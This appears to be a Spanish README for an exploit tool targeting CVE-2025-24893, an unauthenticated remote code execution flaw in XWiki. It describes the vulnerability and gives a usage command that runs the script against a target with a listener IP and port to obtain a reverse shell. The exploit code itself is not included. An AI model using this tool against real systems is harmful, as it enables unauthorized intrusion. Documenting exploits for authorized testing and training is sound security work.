
Exploit estilo OSCP para CVE-2025-24893 en XWiki para Linux
XWiki Platform es una plataforma wiki genérica que proporciona servicios en tiempo de ejecución para aplicaciones construidas sobre ella. Debido a una vulnerabilidad en el endpoint SolrSearch, un usuario no autenticado puede lograr la ejecución remota arbitraria de código. Esta vulnerabilidad afecta la confidencialidad, la integridad y la disponibilidad de toda la instalación de XWiki.
CVE: CVE-2025-24893
A continuación se muestra una demostración del exploit:

Para usar este exploit, sigue estos pasos:
git clone https://github.com/yourusername/CVE-2025-24893.gitcd CVE-2025-24893pip install requests./CVE-2025-24893_linux-xwiki-exploit.py -t http(s)://[target]:(port) -l [Listener IP] -p [Listener PORT] [-hp [Local HTTP PORT]]
Este exploit demuestra la vulnerabilidad de ejecución remota de código descrita en CVE-2025-24893 y permite a un usuario no autenticado obtener una reverse shell en instalaciones vulnerables de XWiki basadas en Linux.
Originalmente desarrollé esta herramienta para usarla en entornos de entrenamiento como los laboratorios de preparación para OSCP y Hack The Box, donde quería una forma sencilla y fiable de reproducir la vulnerabilidad. Como ninguna herramienta existente cumplía con mis requisitos, decidí crear una.
Aunque CVE-2025-24893 ya fue parcheado hace tiempo en las versiones compatibles de XWiki, este exploit solo debe utilizarse contra sistemas que poseas o que tengas autorización explícita para probar.
El autor no asume ninguna responsabilidad por el mal uso de este software ni por cualquier daño derivado de su uso.
Esta herramienta está destinada únicamente a fines educativos y a evaluaciones de seguridad autorizadas.
Úsala solo contra sistemas que poseas o que tengas autorización explícita para probar. El autor no asume ninguna responsabilidad por el mal uso de este software ni por los daños derivados de su uso.
Las contribuciones son bienvenidas.
Si encuentras bugs, tienes sugerencias de mejora o deseas añadir soporte para payloads, plataformas o funciones adicionales, no dudes en abrir un issue o enviar un pull request.
Los comentarios constructivos, los informes de pruebas y las contribuciones de código son muy apreciados.